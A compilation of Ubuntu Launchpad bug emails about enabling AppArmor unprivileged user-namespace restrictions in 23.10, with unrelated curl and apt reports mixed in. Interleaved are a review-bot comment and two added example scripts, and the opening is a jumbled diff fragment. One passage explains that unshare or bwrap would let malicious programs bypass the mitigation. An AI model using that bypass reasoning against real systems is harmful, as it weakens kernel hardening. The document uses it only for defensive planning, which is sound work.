As such, as well as enabling the sysctl via the sysctl.d conf file, it is proposed to add logic into the apparmor.service systemd unit to check that the kernel supports the aforementioned unconfined profile mode and that it is enabled - and if not then to force disable the userns restrictions sysctl via the following logic: userns_restricted=$(sysctl -n kernel.apparmor_restrict_unprivileged_userns) unconfined_userns=$([ -f /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns ] && cat /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns || echo 0) if [ -n "$userns_restricted" ] && [ "$userns_restricted" -eq 1 ]; then - if [ $unconfined_userns -eq 0 ]; then - # userns restrictions rely on unconfined userns to be supported - echo "disabling unprivileged userns restrictions since unconfined userns is not supported / enabled" - sysctl -w kernel.apparmor_restrict_unprivileged_userns=0 - fi + if [ "$unconfined_userns" -eq 0 ]; then + # userns restrictions rely on unconfined userns to be supported + echo "disabling unprivileged userns restrictions since unconfined userns is not supported / enabled" + sysctl -w kernel.apparmor_restrict_unprivileged_userns=0 + fi fi + this allows a local admin to disable the sysctl via the regular sysctl.d + conf approach, but to also make sure we don't inadvertently enable it + when it is not supported by the kernel. - this allows a local admin to disable the sysctl via the regular sysctl.d conf approach, but to also make sure we don't inadvertently enable it when it is not supported by the kernel. 
+ This proposed change has been tested via the QA Regression Testing + project, in particular with the specific test added in + https://git.launchpad.net/qa-regression- + testing/commit/?id=6f2c5ab7c8659174adac772ce0e894328bb5045d + + This produces the following output, confirming the fallback works as + expected on the current mantic kernel (which does not fully support the + userns restrictions): + + --- + + Running test: './test-apparmor.py' distro: 'Ubuntu 23.10' kernel: '6.5.0-5.5 (Ubuntu 6.5.0-5.5-generic 6.5.0)' arch: 'amd64' init: 'systemd' uid: 0/0 SUDO_USER: 'ubuntu') + test_unconfined_userns (__main__.ApparmorTest.test_unconfined_userns) + Test that unconfined userns restrictions are applied ... Skipping private tests + + WARN: kernel rate limiting in effect + Disabling ratelimiting until the next reboot. To renable, run: + # sysctl -w kernel.printk_ratelimit=5 + + (enabling userns restrictions) (restarting apparmor) (checking userns + restrictions got disabled) ok + + -- + Ran 1 test in 0.232s + + OK + + --- + + + Also we can see on a fresh-boot with this new version installed that apparmor.service shows it has disabled the sysctl before loading any profiles even though the conf file has it enabled - and finally we can see that unshare -U works as expected: + + root@sec-mantic-amd64:~# uptime + 07:04:48 up 0 min, 0 user, load average: 0.00, 0.00, 0.00 + + root@sec-mantic-amd64:~# journalctl -b0 --unit apparmor.service --no-pager + Sep 15 07:04:47 sec-mantic-amd64 systemd[1]: Starting apparmor.service - Load AppArmor profiles... + Sep 15 07:04:47 sec-mantic-amd64 apparmor.systemd[308]: Restarting AppArmor + Sep 15 07:04:47 sec-mantic-amd64 apparmor.systemd[308]: disabling unprivileged userns restrictions since
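Review bot: the quoting fix in `+ if [ "$unconfined_userns" -eq 0 ]; then` is right, but the unchanged context line `userns_restricted=$(sysctl -n kernel.apparmor_restrict_unprivileged_userns)` in the same hunk still lets sysctl's stderr reach the journal, so on the older-kernel case this fallback exists for (no such sysctl) every apparmor.service start will log an error from sysctl even though the `[ -n "$userns_restricted" ]` guard keeps the logic correct; suggest `sysctl -n kernel.apparmor_restrict_unprivileged_userns 2>/dev/null` so the only message on that path is the intentional "disabling unprivileged userns restrictions" line. Worth a sentence in the description too: if the features file ever holds something non-numeric, the now-quoted `[ "$unconfined_userns" -eq 0 ]` errors and evaluates false, so the restrictions stay enabled rather than being switched off, which is the conservative direction but not obvious from the snippet.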
[Touch-packages] [Bug 2036128] Re: [FFe] enable unprivileged user namespace restrictions by default for mantic
Proposed changes for FFe to enable the sysctl by default but add fallback logic to disable it if the system doesn't provide all the required features. ** Patch added: "apparmor_4.0.0~alpha2-0ubuntu4.debdiff" https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2036128/+attachment/5701125/+files/apparmor_4.0.0~alpha2-0ubuntu4.debdiff -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2036128 Title: [FFe] enable unprivileged user namespace restrictions by default for mantic Status in apparmor package in Ubuntu: New Bug description: As per https://discourse.ubuntu.com/t/spec-unprivileged-user- namespace-restrictions-via-apparmor-in-ubuntu-23-10/37626, unprivileged user namespace restrictions for Ubuntu 23.10 are to be enabled by default via a sysctl.d conf file in apparmor. In https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2035315 new apparmor profiles were added to the apparmor package for various applications which require unprivileged user namespaces, using a new unconfined profile mode. To support this an additional change was added to the mantic kernel in https://git.launchpad.net/~ubuntu- kernel/ubuntu/+source/linux/+git/mantic/commit?h=master- next=7327726a2dbf571e05f7c095916dcce0347790b4 which is still currently unreleased. Without this kernel change, if userns restrictions are enabled the existing policies added above will not actually work to allow them to be used by the various applications. As such we need to ensure that userns restrictions are not enabled via sysctl when this feature is not present / enabled. Whilst it may be possible to capture the dependency logic via `Breaks:` or similar, this would not help in the case that a user booted into an older kernel with the new apparmor userspace package. 
  As such, as well as enabling the sysctl via the sysctl.d conf file, it is proposed to add logic into the apparmor.service systemd unit to check that the kernel supports the aforementioned unconfined profile mode and that it is enabled - and if not then to force disable the userns restrictions sysctl via the following logic:

    userns_restricted=$(sysctl -n kernel.apparmor_restrict_unprivileged_userns)
    unconfined_userns=$([ -f /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns ] && cat /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns || echo 0)
    if [ -n "$userns_restricted" ] && [ "$userns_restricted" -eq 1 ]; then
      if [ "$unconfined_userns" -eq 0 ]; then
        # userns restrictions rely on unconfined userns to be supported
        echo "disabling unprivileged userns restrictions since unconfined userns is not supported / enabled"
        sysctl -w kernel.apparmor_restrict_unprivileged_userns=0
      fi
    fi

  This allows a local admin to disable the sysctl via the regular sysctl.d conf approach, but also makes sure we don't inadvertently enable it when it is not supported by the kernel.

  This proposed change has been tested via the QA Regression Testing project, in particular with the specific test added in https://git.launchpad.net/qa-regression-testing/commit/?id=6f2c5ab7c8659174adac772ce0e894328bb5045d

  This produces the following output, confirming the fallback works as expected on the current mantic kernel (which does not fully support the userns restrictions):

  ---

  Running test: './test-apparmor.py' distro: 'Ubuntu 23.10' kernel: '6.5.0-5.5 (Ubuntu 6.5.0-5.5-generic 6.5.0)' arch: 'amd64' init: 'systemd' uid: 0/0 SUDO_USER: 'ubuntu')
  test_unconfined_userns (__main__.ApparmorTest.test_unconfined_userns)
  Test that unconfined userns restrictions are applied ... Skipping private tests

  WARN: kernel rate limiting in effect
  Disabling ratelimiting until the next reboot.
  To renable, run:
  # sysctl -w kernel.printk_ratelimit=5

  (enabling userns restrictions) (restarting apparmor) (checking userns restrictions got disabled) ok

  --
  Ran 1 test in 0.232s

  OK

  ---

  Also we can see on a fresh boot with this new version installed that apparmor.service shows it has disabled the sysctl before loading any profiles even though the conf file has it enabled - and finally we can see that unshare -U works as expected:

  root@sec-mantic-amd64:~# uptime
   07:04:48 up 0 min,  0 user,  load average: 0.00, 0.00, 0.00

  root@sec-mantic-amd64:~# journalctl -b0 --unit apparmor.service --no-pager
  Sep 15 07:04:47 sec-mantic-amd64 systemd[1]: Starting apparmor.service - Load AppArmor profiles...
  Sep 15 07:04:47 sec-mantic-amd64 apparmor.systemd[308]: Restarting AppArmor
  Sep 15 07:04:47
[Touch-packages] [Bug 2036128] [NEW] [FFe] enable unprivileged user namespace restrictions by default for mantic
Public bug reported:

As per https://discourse.ubuntu.com/t/spec-unprivileged-user-namespace-restrictions-via-apparmor-in-ubuntu-23-10/37626, unprivileged user namespace restrictions for Ubuntu 23.10 are to be enabled by default via a sysctl.d conf file in apparmor.

In https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2035315 new apparmor profiles were added to the apparmor package for various applications which require unprivileged user namespaces, using a new unconfined profile mode. To support this an additional change was added to the mantic kernel in https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/mantic/commit?h=master-next=7327726a2dbf571e05f7c095916dcce0347790b4 which is still currently unreleased.

Without this kernel change, if userns restrictions are enabled the existing policies added above will not actually work to allow them to be used by the various applications. As such we need to ensure that userns restrictions are not enabled via sysctl when this feature is not present / enabled. Whilst it may be possible to capture the dependency logic via `Breaks:` or similar, this would not help in the case that a user booted into an older kernel with the new apparmor userspace package.
As such, as well as enabling the sysctl via the sysctl.d conf file, it is proposed to add logic into the apparmor.service systemd unit to check that the kernel supports the aforementioned unconfined profile mode and that it is enabled - and if not then to force disable the userns restrictions sysctl via the following logic:

  userns_restricted=$(sysctl -n kernel.apparmor_restrict_unprivileged_userns)
  unconfined_userns=$([ -f /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns ] && cat /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns || echo 0)
  if [ -n "$userns_restricted" ] && [ "$userns_restricted" -eq 1 ]; then
    if [ "$unconfined_userns" -eq 0 ]; then
      # userns restrictions rely on unconfined userns to be supported
      echo "disabling unprivileged userns restrictions since unconfined userns is not supported / enabled"
      sysctl -w kernel.apparmor_restrict_unprivileged_userns=0
    fi
  fi

This allows a local admin to disable the sysctl via the regular sysctl.d conf approach, but also makes sure we don't inadvertently enable it when it is not supported by the kernel.

** Affects: apparmor (Ubuntu)
     Importance: Undecided
         Status: New

https://bugs.launchpad.net/bugs/2036128

Title:
  [FFe] enable unprivileged user namespace restrictions by default for mantic

Status in apparmor package in Ubuntu:
  New
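The fallback check proposed above, factored into a function whose inputs are injected so the edge cases (features file absent, sysctl absent on an older kernel, non-numeric content) can be exercised offline. This is an added example written for this page, not the apparmor package's own apparmor.service logic; the function names, the injected features-file argument and the DRY_RUN variable are assumptions.

```shell
#!/bin/sh
# Added example (not code from the apparmor package): the userns fallback
# decision from the bug, as a testable function.
#
# userns_fallback_needed RESTRICTED FEATURES_FILE
#   RESTRICTED    : current value of kernel.apparmor_restrict_unprivileged_userns
#                   (empty when the running kernel has no such sysctl)
#   FEATURES_FILE : path standing in for
#                   /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns
# Exit status 0: the sysctl must be forced back to 0.  1: leave it alone.
userns_fallback_needed() {
    restricted="$1"
    features="$2"
    # Same rule as the bug: a missing features file counts as unsupported (0).
    if [ -f "$features" ]; then
        unconfined=$(cat "$features")
    else
        unconfined=0
    fi
    # An empty or non-numeric sysctl value must never be treated as "enabled".
    case "$restricted" in
        ''|*[!0-9]*) return 1 ;;
    esac
    # Garbage in the features file counts as unsupported rather than aborting.
    case "$unconfined" in
        ''|*[!0-9]*) unconfined=0 ;;
    esac
    [ "$restricted" -eq 1 ] && [ "$unconfined" -eq 0 ]
}

# Wrapper mirroring the proposed apparmor.service step against the live system.
# With DRY_RUN=1 it only prints the corrective command instead of running it.
apply_userns_fallback() {
    restricted=$(sysctl -n kernel.apparmor_restrict_unprivileged_userns 2>/dev/null)
    if userns_fallback_needed "$restricted" \
        /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns; then
        echo "disabling unprivileged userns restrictions since unconfined userns is not supported / enabled"
        if [ "${DRY_RUN:-0}" = 1 ]; then
            echo "would run: sysctl -w kernel.apparmor_restrict_unprivileged_userns=0"
        else
            sysctl -w kernel.apparmor_restrict_unprivileged_userns=0
        fi
    fi
}
```

Run `DRY_RUN=1 sh -c '. ./fallback.sh; apply_userns_fallback'` (any file name) on a mantic box to see which branch the live kernel takes without changing anything.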
[Touch-packages] [Bug 2035315] [NEW] Unprivileged user namespace restrictions break various applications
  - /usr/bin/lxc-usernsexec
- mmdebstrap
  - /usr/bin/mmdebstrap
- ocproxy
  - /usr/bin/vpnns
- qt6-webengine
  - /usr/lib/qt6/libexec/QtWebEngineProcess
- qtwebengine-opensource-src
  - /usr/lib/@{multiarch}/qt5/libexec/QtWebEngineProcess
- rootlesskit
  - /usr/bin/rootlesskit
- rpm
  - /usr/bin/rpm
- runc
  - /usr/sbin/runc

The usage of CLONE_NEWUSER within the following packages was not able to be analysed fully and so profiles are included for all relevant binaries:

- rust-virtiofsd
  - /usr/libexec/virtiofsd
- sbuild
  - /usr/bin/sbuild
  - /usr/bin/sbuild-abort
  - /usr/bin/sbuild-apt
  - /usr/bin/sbuild-checkpackages
  - /usr/bin/sbuild-clean
  - /usr/bin/sbuild-createchroot
  - /usr/bin/sbuild-distupgrade
  - /usr/bin/sbuild-hold
  - /usr/bin/sbuild-shell
  - /usr/bin/sbuild-unhold
  - /usr/bin/sbuild-update
  - /usr/bin/sbuild-upgrade
  - /usr/sbin/sbuild-adduser
  - /usr/sbin/sbuild-destroychroot
- slirp4netns
  - /usr/bin/slirp4netns
- stress-ng
  - /usr/bin/stress-ng
- systemd
- thunderbird
  - /usr/bin/thunderbird
- toybox
  - /bin/toybox
- trinity
  - /usr/bin/trinity
- tup
  - /usr/bin/tup
- userbindmount
  - /usr/bin/userbindmount
- uwsgi
  - /usr/bin/uwsgi-core
- vdens
  - /usr/bin/vdens

Finally as noted in https://bugs.launchpad.net/ubuntu/+source/linux-meta-nvidia-5.19/+bug/2017980 the popular third-party application Google Chrome also requires unprivileged user namespaces:

- google-chrome
  - /opt/google/chrome/chrome

** Affects: apparmor (Ubuntu)
     Importance: High
     Assignee: Alex Murray (alexmurray)
         Status: Confirmed

** Changed in: apparmor (Ubuntu)
     Assignee: (unassigned) => Alex Murray (alexmurray)

** Changed in: apparmor (Ubuntu)
   Importance: Undecided => High

** Changed in: apparmor (Ubuntu)
       Status: New => Confirmed
https://bugs.launchpad.net/bugs/2035315

Title:
  Unprivileged user namespace restrictions break various applications

Status in apparmor package in Ubuntu:
  Confirmed

Bug description:
  When the unprivileged user namespace restrictions are enabled, various applications within and outside the Ubuntu archive fail to function, as they use unprivileged user namespaces as part of their normal operation.

  A search of the Ubuntu archive for the 23.10 release was performed looking for all applications that make legitimate use of the CLONE_NEWUSER argument, the details of which can be seen in https://docs.google.com/spreadsheets/d/1MOPVoTW0BROF1TxYqoWeJ3c6w2xKElI4w-VjdCG0m9s/edit#gid=2102562502

  For each package identified in that list, an investigation was made to determine if the application actually used this as an unprivileged user, and if so which of the binaries within the package were affected. The full investigation can be seen in https://warthogs.atlassian.net/browse/SEC-1898 (which is unfortunately private) but is summarised to the following list of Ubuntu source packages, with the affected binaries as noted. NOTE that due to time constraints for some packages it was not possible to finish the complete investigation and so for those *all* the binaries from the package are listed below.

  For each of these binaries, an apparmor profile is required so that the binary can be granted use of unprivileged user namespaces - an example profile for the ch-run binary within the charliecloud package is shown:

    $ cat /etc/apparmor.d/usr.bin.ch-run
    abi ,
    include
    /usr/bin/ch-run flags=(unconfined) {
      userns,
      # Site-specific additions and overrides. See local/README for details.
      include if exists
    }

  However, in a few select cases, it has been decided not to ship an apparmor profile, since this would effectively allow this mitigation to be bypassed.
  In particular, the unshare and setns binaries within the util-linux package are installed on every Ubuntu system, and allow an unprivileged user the ability to launch an arbitrary application within a new user namespace. Any malicious application then that wished to exploit an unprivileged user namespace to conduct an attack on the kernel would simply need to spawn itself via `unshare -U` or similar to be granted this permission. Therefore, due to the ubiquitous nature of the unshare (and setns) binaries, profiles are not planned to be provided for these by default.

  Similarly, the bwrap binary within bubblewrap is also installed by default on Ubuntu Desktop 23.10 and can also be used to launch arbitrary binaries within a new user namespace and so no profile is planned to be provided for this either.

  Those packages for which either a profile is not required or which a profile is not planned are listed below, whilst the list of packages that require
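An audit helper for the policy described in this report: it lists every profile in a directory that carries a `userns,` rule (and whether it is an unconfined-mode profile), then flags the generic launchers the report deliberately leaves unprofiled (unshare, setns, bwrap). This is added example code, not part of the bug report or the apparmor package; the sample profiles are constructed, and the parser assumes the profile header starts with the binary path, as the ch-run example does.

```shell
#!/bin/sh
# Added example (not from the bug report or the apparmor package): audit which
# binaries have been granted unprivileged user namespaces via AppArmor profiles.

# audit_userns_profiles DIR
# Prints one line per profile that grants userns:  <binary> <mode> <file>
# mode is "unconfined" when the header carries flags=(unconfined), else "confined".
# Assumption: the header is "/path/to/binary [flags=(...)] {" (no "profile name" form).
audit_userns_profiles() {
    dir="$1"
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        awk -v file="$f" '
            # first line that starts with a path and ends with "{" is the header
            header == "" && $1 ~ /^\// && $0 ~ /[{][[:space:]]*$/ {
                header = $1
                mode = ($0 ~ /flags=[(][^)]*unconfined[^)]*[)]/) ? "unconfined" : "confined"
            }
            # strip comments so a commented-out "# userns," does not count
            { line = $0; sub(/#.*/, "", line) }
            line ~ /^[[:space:]]*userns[[:space:]]*,/ { granted = 1 }
            END { if (header != "" && granted) print header, mode, file }
        ' "$f"
    done
}

# flag_generic_launchers DIR
# Warns about profiles on binaries that can run arbitrary programs inside a new
# user namespace; granting them userns defeats the restriction for everything.
flag_generic_launchers() {
    audit_userns_profiles "$1" | while read -r bin mode file; do
        case "${bin##*/}" in
            unshare|setns|bwrap)
                echo "WARNING: $bin ($mode) grants userns to a generic launcher: $file" ;;
        esac
    done
}

# make_sample_profiles DIR: constructed sample profiles for an offline run.
# ch-run is modelled on the report's example; bwrap is the kind of profile the
# report declines to ship; foo only has a commented-out rule.
make_sample_profiles() {
    dir="$1"
    cat > "$dir/usr.bin.ch-run" <<'EOF'
abi <abi/4.0>,
include <tunables/global>
/usr/bin/ch-run flags=(unconfined) {
  userns,
  # Site-specific additions and overrides. See local/README for details.
  include if exists <local/usr.bin.ch-run>
}
EOF
    cat > "$dir/usr.bin.bwrap" <<'EOF'
abi <abi/4.0>,
include <tunables/global>
/usr/bin/bwrap flags=(unconfined) {
  userns,
}
EOF
    cat > "$dir/usr.bin.foo" <<'EOF'
abi <abi/4.0>,
include <tunables/global>
/usr/bin/foo {
  # userns,   (commented out: no grant)
  /etc/foo.conf r,
}
EOF
}

# "./audit.sh --demo" runs against the constructed samples; otherwise point
# audit_userns_profiles / flag_generic_launchers at /etc/apparmor.d.
if [ "${1:-}" = "--demo" ]; then
    d=$(mktemp -d)
    make_sample_profiles "$d"
    audit_userns_profiles "$d"
    flag_generic_launchers "$d"
    rm -rf "$d"
fi
```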
[Touch-packages] [Bug 2034449] Re: IP phising
Thank you for using Ubuntu and taking the time to report a bug. Your report should contain, at a minimum, the following information so we can better find the source of the bug and work to resolve it.

Submitting the bug about the proper source package is essential. For help see https://wiki.ubuntu.com/Bugs/FindRightPackage .

Additionally, in the report please include:

1) The release of Ubuntu you are using, via 'cat /etc/lsb-release' or System -> About Ubuntu.
2) The version of the package you are using, via 'dpkg -l PKGNAME | cat' or by checking in Synaptic.
3) What happened and what you expected to happen.

The Ubuntu community has also created debugging procedures for a wide variety of packages at https://wiki.ubuntu.com/DebuggingProcedures . Following the debugging instructions for the affected package will make your bug report much more complete. Thanks!

** Information type changed from Private Security to Public

** Changed in: curl (Ubuntu)
       Status: New => Invalid

https://bugs.launchpad.net/bugs/2034449

Title:
  IP phising

Status in curl package in Ubuntu:
  Invalid

Bug description:
  good afternoon I am writing to you because I have found some serious bugs about IPs in Ubuntu... I was trying to access the IPs of several different pages through the terminal with the Curl, wget and dig commands and I always got the same IP... I put it in the Firefox search engine to find out which page it was and the search engine warned me that it was a malicious page so naturally I did not enter it. The IP is this: 90.169.41.164 so obviously I am suspicious.
  Translated with www.DeepL.com/Translator (free version)

  ProblemType: Bug
  DistroRelease: Ubuntu 23.04
  Package: curl 7.88.1-8ubuntu2.1
  ProcVersionSignature: Ubuntu 6.2.0-32.32-generic 6.2.16
  Uname: Linux 6.2.0-32-generic x86_64
  ApportVersion: 2.26.1-0ubuntu2
  Architecture: amd64
  CasperMD5CheckResult: unknown
  CurrentDesktop: ubuntu:GNOME
  Date: Wed Sep  6 00:00:39 2023
  InstallationDate: Installed on 2023-08-06 (30 days ago)
  InstallationMedia: Ubuntu 23.04 "Lunar Lobster" - Release amd64 (20230418)
  ProcEnviron:
   LANG=es_ES.UTF-8
   PATH=(custom, no user)
   SHELL=/bin/bash
   TERM=xterm-256color
   XDG_RUNTIME_DIR=
  SourcePackage: curl
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/curl/+bug/2034449/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2034133] Re: i cant update ubuntu
Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find.

** Information type changed from Private Security to Public

https://bugs.launchpad.net/bugs/2034133

Title:
  i cant update ubuntu

Status in apt package in Ubuntu:
  New

Bug description:
  sudo apt-get update
  Obj:1 http://es.archive.ubuntu.com/ubuntu lunar InRelease
  Obj:2 https://dl.winehq.org/wine-builds/ubuntu lunar InRelease
  Obj:3 http://es.archive.ubuntu.com/ubuntu lunar-updates InRelease
  Obj:4 http://es.archive.ubuntu.com/ubuntu lunar-backports InRelease
  Obj:5 http://es.archive.ubuntu.com/ubuntu lunar-security InRelease
  Obj:6 http://security.ubuntu.com/ubuntu lunar-security InRelease
  Obj:7 http://es.archive.ubuntu.com/ubuntu lunar-proposed InRelease
  Ign:8 https://ppa.launchpadcontent.net/costales/yaru-colors-folder-color/ubuntu lunar InRelease
  Err:9 https://ppa.launchpadcontent.net/costales/yaru-colors-folder-color/ubuntu lunar Release
    404  Not Found [IP: 185.125.190.52 443]
  Leyendo lista de paquetes... Hecho
  E: El repositorio «https://ppa.launchpadcontent.net/costales/yaru-colors-folder-color/ubuntu lunar Release» no tiene un fichero de Publicación.
  N: No se puede actualizar de un repositorio como este de forma segura y por tanto está deshabilitado por omisión.
  N: Vea la página de manual apt-secure(8) para los detalles sobre la creación de repositorios y la configuración de usuarios.
  ProblemType: Bug
  DistroRelease: Ubuntu 23.04
  Package: apt 2.6.0ubuntu0.1
  ProcVersionSignature: Ubuntu 6.2.0-32.32-generic 6.2.16
  Uname: Linux 6.2.0-32-generic x86_64
  ApportVersion: 2.26.1-0ubuntu2
  Architecture: amd64
  CasperMD5CheckResult: unknown
  CurrentDesktop: ubuntu:GNOME
  Date: Tue Sep  5 12:12:29 2023
  InstallationDate: Installed on 2023-08-06 (29 days ago)
  InstallationMedia: Ubuntu 23.04 "Lunar Lobster" - Release amd64 (20230418)
  ProcEnviron:
   LANG=es_ES.UTF-8
   PATH=(custom, no user)
   SHELL=/bin/bash
   TERM=xterm-256color
   XDG_RUNTIME_DIR=
  SourcePackage: apt
  UpgradeStatus: No upgrade log present (probably fresh install)
[Touch-packages] [Bug 2026227] [NEW] Backport 4.0 ABI for AppArmor 3 in mantic
Public bug reported:

To support the use of AppArmor policies that specify features like userns, add the new 4.0 ABI from upstream https://gitlab.com/apparmor/apparmor/-/merge_requests/1061.

Note this should not be enabled by default (as the existing AppArmor profiles have not been updated to account for this) but it will allow easier testing of profiles that want to support this new ABI.

Also note this ABI is identical to that provided by the kernel in mantic and lunar currently:

# lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu Mantic Minotaur (development branch)
Release:        23.10
Codename:       mantic
# uname -a
Linux sec-mantic-amd64 6.3.0-7-generic #7-Ubuntu SMP PREEMPT_DYNAMIC Thu Jun  8 16:02:30 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
# diff /etc/apparmor.d/abi/4.0 <(aa-features-abi -x)
# md5sum /etc/apparmor.d/abi/4.0 <(aa-features-abi -x)
f17b0a97806d733b5b884d8a1c2fea37  /etc/apparmor.d/abi/4.0
f17b0a97806d733b5b884d8a1c2fea37  /dev/fd/63

** Affects: apparmor (Ubuntu)
     Importance: Undecided
     Assignee: Alex Murray (alexmurray)
         Status: New

** Affects: apparmor (Ubuntu Mantic)
     Importance: Undecided
     Assignee: Alex Murray (alexmurray)
         Status: New

** Changed in: apparmor (Ubuntu)
     Assignee: (unassigned) => Alex Murray (alexmurray)

** Also affects: apparmor (Ubuntu Mantic)
   Importance: Undecided
     Assignee: Alex Murray (alexmurray)
       Status: New

https://bugs.launchpad.net/bugs/2026227

Title:
  Backport 4.0 ABI for AppArmor 3 in mantic

Status in apparmor package in Ubuntu:
  New
Status in apparmor source package in Mantic:
  New
[Touch-packages] [Bug 2024637] Re: apparmor.service tries to load snapd generated apparmor profiles but fails
** Patch added: "bionic debdiff with corrected version number"
   https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2024637/+attachment/5682930/+files/apparmor_2.12-4ubuntu5.3.debdiff

** Patch removed: "debdiff for bionic"
   https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2024637/+attachment/5682828/+files/apparmor_2.12-4ubuntu5.2.debdiff

https://bugs.launchpad.net/bugs/2024637

Title:
  apparmor.service tries to load snapd generated apparmor profiles but fails

Status in apparmor package in Ubuntu:
  New
Status in snapd package in Ubuntu:
  New
Status in apparmor source package in Xenial:
  In Progress
Status in snapd source package in Xenial:
  New
Status in apparmor source package in Bionic:
  In Progress
Status in snapd source package in Bionic:
  New

Bug description:
  As of snapd 2.60, when installed as a snap, snapd includes its own vendored apparmor_parser and configuration. As such, it generates profiles using newer apparmor features than the system installed apparmor may support.

  This is seen as a failure to load the apparmor.service at boot once this new snapd snap with the vendored apparmor is installed:

  root@sec-bionic-amd64:~# systemctl status apparmor
  ● apparmor.service - AppArmor initialization
     Loaded: loaded (/lib/systemd/system/apparmor.service; enabled; vendor preset: enabled)
     Active: failed (Result: exit-code) since Thu 2023-06-22 06:51:32 UTC; 8min ago
       Docs: man:apparmor(7)
             http://wiki.apparmor.net/
   Main PID: 1590 (code=exited, status=123)

  Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf.
  Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd
  Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf.
  Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd
  Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /var/lib/snapd/apparmor/profiles/snap-confine.snapd.19567 in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf.
  Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /var/lib/snapd/apparmor/profiles/snap-confine.snapd.19567 in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf.
  Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]:    ...fail!
  Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: apparmor.service: Main process exited, code=exited, status=123/n/a
  Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: apparmor.service: Failed with result 'exit-code'.
  Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: Failed to start AppArmor initialization.

  root@sec-bionic-amd64:~# snap version
  snap    2.60
  snapd   2.60
  series  16
  ubuntu  18.04
  kernel  4.15.0-212-generic

  root@sec-bionic-amd64:~# snap debug sandbox-features --required \
      apparmor:parser:snapd-internal && echo snapd has internal vendored apparmor
  snapd has internal vendored apparmor

  In LP: #1871148 apparmor was updated in focal+ to stop loading apparmor profiles generated by snapd as since snapd 2.44.3 it has shipped the snapd.apparmor.service unit which loads its apparmor profiles on boot.

  apparmor in bionic and xenial should be updated to stop loading snapd generated apparmor profiles and instead leave this up to snapd.apparmor.service.
  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: apparmor 2.12-4ubuntu5.1
  ProcVersionSignature: Ubuntu 4.15.0-212.223-generic 4.15.18
  Uname: Linux 4.15.0-212-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.29
  Architecture: amd64
  Date: Thu Jun 22 06:52:02 2023
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  ProcKernelCmdline: BOOT_IMAGE=/boot/vmlinuz-4.15.0-212-generic root=UUID=da79cdd1-11be-4719-8482-46ce30623eaa ro quiet splash console=tty1 console=ttyS0 vt.handoff=1
  PstreeP: Error: [Errno 2] No such file or directory: '/usr/bin/pstree': '/usr/bin/pstree'
  SourcePackage: apparmor
  UpgradeStatus: No upgrade log present (probably fresh install)
[Touch-packages] [Bug 2024637] Re: apparmor.service tries to load snapd generated apparmor profiles but fails
It turns out there was already an upload of apparmor 2.12-4ubuntu5.2 to bionic-proposed that got rejected (https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1703821/comments/15), so this update will instead need to skip this version number and use 2.12-4ubuntu5.3 instead.

https://bugs.launchpad.net/bugs/2024637

Title:
  apparmor.service tries to load snapd generated apparmor profiles but fails
[Touch-packages] [Bug 2024637] Re: apparmor.service tries to load snapd generated apparmor profiles but fails
** Patch added: "xenial debdiff"
   https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2024637/+attachment/5682832/+files/apparmor_2.10.95-0ubuntu2.12.debdiff

** Changed in: apparmor (Ubuntu Xenial)
   Importance: Undecided => High

** Changed in: apparmor (Ubuntu Bionic)
   Importance: Undecided => High

** Changed in: apparmor (Ubuntu Xenial)
     Assignee: (unassigned) => Alex Murray (alexmurray)

** Changed in: apparmor (Ubuntu Bionic)
     Assignee: (unassigned) => Alex Murray (alexmurray)

